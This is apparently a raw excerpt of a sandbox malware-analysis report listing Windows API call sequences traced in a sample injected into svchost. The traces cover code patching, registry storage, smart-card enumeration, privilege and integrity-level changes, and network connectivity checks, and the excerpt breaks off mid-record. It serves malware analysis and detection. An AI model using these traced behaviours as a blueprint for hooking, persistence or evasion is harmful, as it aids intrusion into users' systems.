                                                                                                                                                                                                                • Part of subcall function 0265A6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A6C6
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A6CD
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: memset.MSVCRT ref: 0265A6DE
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A72A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,76F8F550,00000000,753CBD50,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A697
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A69E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2609073853-0
                                                                                                                                                                                                              • Opcode ID: 3f1d5c75586c6703a4a93ec52cabc62579929d502b1f74f3619961fffe88a17d
                                                                                                                                                                                                              • Instruction ID: 493331c13aba54b65cbe0b8b764c96c607c59b16811964aee9cab93527832a25
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f1d5c75586c6703a4a93ec52cabc62579929d502b1f74f3619961fffe88a17d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50411976A00226ABCB109FB88C84FBE7B6AEF44614F45472CF94697384DB35DD05C7A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,026694A4,00000000,00140B17), ref: 02669005
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,026694A4,00000000,00140B17), ref: 0266900C
                                                                                                                                                                                                              • memset.MSVCRT ref: 0266901F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,026694A0,?,026694A4,00000000,00140B17), ref: 026690CE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,026694A4,00000000,00140B17), ref: 026690D1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,026694A4,00000000,00140B17), ref: 026690DD
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,026694A4,00000000,00140B17), ref: 026690E0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocateFreeValidatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 219023833-0
                                                                                                                                                                                                              • Opcode ID: f8aa2d8a925daae79f21a952dc4e47318a5186116241e83ae10eabda492c0a52
                                                                                                                                                                                                              • Instruction ID: 39db19ff5581b6c2850bcddf39df7053f6db9020cb6550e8791b6b359a112628
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8aa2d8a925daae79f21a952dc4e47318a5186116241e83ae10eabda492c0a52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F21A2B0602740ABC721AF75D9886ABBFE9EF45314F00891DE55E8B300C7749445CFD2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                              • API String ID: 3225117150-898603304
                                                                                                                                                                                                              • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8), ref: 0265A7CB
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 0265A818
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0265A847
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000), ref: 0265A84E
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 0265A862
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 0265A879
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265A881
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 842647815-0
                                                                                                                                                                                                              • Opcode ID: e009ad9649fcb94f36813f574abeb23a9555f13f9d64fed2a3cbb094edc38cae
                                                                                                                                                                                                              • Instruction ID: 7c50dd3b47baffe5e18f528474b7013a3729adf69c7966bdbdc2f53547477aa1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e009ad9649fcb94f36813f574abeb23a9555f13f9d64fed2a3cbb094edc38cae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA212875A40701EFD718CF55D994E2AB7B5FB48700F518A08EA4A5B790CB34FD51CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 026474A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02654E91,?,00000000), ref: 026474C6
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 026474E4
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 0264750D
                                                                                                                                                                                                                • Part of subcall function 026474A0: RtlAllocateHeap.NTDLL(00000000,?,?,02654E91,?,00000000,?,?,00000000), ref: 02647514
                                                                                                                                                                                                                • Part of subcall function 026474A0: memset.MSVCRT ref: 02647527
                                                                                                                                                                                                                • Part of subcall function 026474A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02647553
                                                                                                                                                                                                                • Part of subcall function 026474A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02647563
                                                                                                                                                                                                                • Part of subcall function 026474A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02647572
                                                                                                                                                                                                                • Part of subcall function 026474A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02647585
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647594
                                                                                                                                                                                                                • Part of subcall function 026474A0: HeapValidate.KERNEL32(00000000), ref: 0264759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,76F92F00,02653D3F), ref: 0264791C
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02647923
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647933
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,76F92F00,02653D3F), ref: 02647955
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02647958
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647965
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02647968
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$AllocateValidatememset$CreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3862602232-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02643B25,?), ref: 026438C0
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(00000000,757758f5a,00000000,00000004,?,00000004,?,?,02643B25,?), ref: 026438DC
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000,?,?,02643B25,?), ref: 026438EA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,02643B25,?), ref: 026438F8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 757758f5a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-2885694659
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 026696E6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026696ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 026696FA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02669701
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02669710
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02669713
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02669720
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02669723
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02668AF4
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02669447), ref: 02668B0E
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,02669447), ref: 02668B36
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02669447), ref: 02668B42
                                                                                                                                                                                                                • Part of subcall function 02647310: GetHandleInformation.KERNEL32(?,00000000), ref: 02647324
                                                                                                                                                                                                                • Part of subcall function 02647310: CloseHandle.KERNEL32(?), ref: 02647335
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02669447), ref: 02668B6E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00140B17,02669447,00000000,00140B17), ref: 02668BA0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3741995677-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02656A83,00000000), ref: 02665875
                                                                                                                                                                                                              • SCardListReadersA.WINSCARD(02656A83,00000000,?,FFFFFFFF), ref: 0266588C
                                                                                                                                                                                                              • SCardConnectA.WINSCARD(02656A83,?,00000002,00000003,?,?), ref: 026658BE
                                                                                                                                                                                                              • SCardDisconnect.WINSCARD(?,00000000), ref: 026658E9
                                                                                                                                                                                                              • SCardFreeMemory.WINSCARD(02656A83,?), ref: 02665905
                                                                                                                                                                                                              • SCardReleaseContext.WINSCARD(02656A83), ref: 02665913
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231658416-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                                • Part of subcall function 02665930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                                • Part of subcall function 02665930: AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                                • Part of subcall function 02665930: GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                                • Part of subcall function 02665930: CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustCloseConvertErrorFreeHandleInfoLastLocalLookupNamedPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 2236266002-820036962
                                                                                                                                                                                                              • Opcode ID: a34f2f50a4b26ad1885a2691a137f9a0c05e6d8a6ace13582283a1ad5a34da14
                                                                                                                                                                                                              • Instruction ID: baee0a2cf79cbf8ade8a61d6e76b7536c1d701a5e383d1e507ef07803f0bf25b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a34f2f50a4b26ad1885a2691a137f9a0c05e6d8a6ace13582283a1ad5a34da14
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84014C75A40218BBDB10DEA59C89EFFBBBCEF44744F40424AB906D2240D771DA44CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02643B17), ref: 02643864
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,757758f5a,00000000,?,00000000,?), ref: 02643885
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02643893
                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: 757758f5a$software\microsoft
                                                                                                                                                                                                              • API String ID: 3677997916-2885694659
                                                                                                                                                                                                              • Opcode ID: e27d749940ba47a0da56e21d183686e9b31535cc080edee8ec650a336c455549
                                                                                                                                                                                                              • Instruction ID: 978ef4053dea825be60a3e60498e99e26024383410524fd9c1da66ed61fa6582
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e27d749940ba47a0da56e21d183686e9b31535cc080edee8ec650a336c455549
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDF0ECB5E40308FBEB10DFE4CD45FEEB7B8EB04704F504599E906E6280D7B5AA548B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02669234), ref: 02668D83
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02669234), ref: 02668DAB
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02669234), ref: 02668DD5
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02669234), ref: 02668DE3
                                                                                                                                                                                                              • FileTimeToDosDateTime.KERNEL32(?,02669234,?), ref: 02668DF5
                                                                                                                                                                                                                • Part of subcall function 02668890: GetFileType.KERNEL32(?,00000000,00000000), ref: 02668899
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 60630809-0
                                                                                                                                                                                                              • Opcode ID: a6b2e012f089f5731a788e4bb32a5e2fd6ec9401db413769de2b6b8e6fb77784
                                                                                                                                                                                                              • Instruction ID: b00229589f63574dbf7220873b349463b3058dd9d08c5f9ad10a444aef9f2bbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6b2e012f089f5731a788e4bb32a5e2fd6ec9401db413769de2b6b8e6fb77784
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 422132B29007449FC720CFA9D9C45BBF7F8FB48314B500A2EE596C2A40D775A5588B60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646E00
                                                                                                                                                                                                                • Part of subcall function 02654F80: IsNetworkAlive.SENSAPI(02646E0D,00000000), ref: 02654F93
                                                                                                                                                                                                                • Part of subcall function 02654F80: IsUserAnAdmin.SHELL32 ref: 02654FA1
                                                                                                                                                                                                                • Part of subcall function 02654F80: DnsFlushResolverCache.DNSAPI ref: 02654FAB
                                                                                                                                                                                                                • Part of subcall function 02654F80: memset.MSVCRT ref: 02654FC8
                                                                                                                                                                                                                • Part of subcall function 02654F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02654FE7
                                                                                                                                                                                                                • Part of subcall function 02654F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02655000
                                                                                                                                                                                                                • Part of subcall function 02654F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655013
                                                                                                                                                                                                                • Part of subcall function 02654F80: memset.MSVCRT ref: 0265502C
                                                                                                                                                                                                                • Part of subcall function 02654F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02655045
                                                                                                                                                                                                                • Part of subcall function 02654F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02655058
                                                                                                                                                                                                                • Part of subcall function 02654F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655065
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02646E1C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02646E78
                                                                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,76F90F10,?,00000000,00000000), ref: 02646EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02646EB8
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2160739018-0
                                                                                                                                                                                                              • Opcode ID: 0badd0318c111fcb8ca262b3b2a8c203ea07960a1bc2c6a1bcc41e03936fa8d8
                                                                                                                                                                                                              • Instruction ID: 42104d674fb404b5a610e68c75c440b67177e4aba19e2ef32ed52ee9b9cbaddc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0badd0318c111fcb8ca262b3b2a8c203ea07960a1bc2c6a1bcc41e03936fa8d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26213BB1A843157BEB109B54DCC0F5E329EAB86718F411638EB49971C0DFB0E8C18ADA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 026580CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02658108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02658123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 0265812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02658151
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: ef3c5762321e6216d52af9466e6dec2fd26ee566b4045460f8085ea860fe8b82
                                                                                                                                                                                                              • Instruction ID: 99c1ab5259f502a1ed0907c5ee9fc4ba67b33d02d5bc6f82dd918ef87ef9d6f4
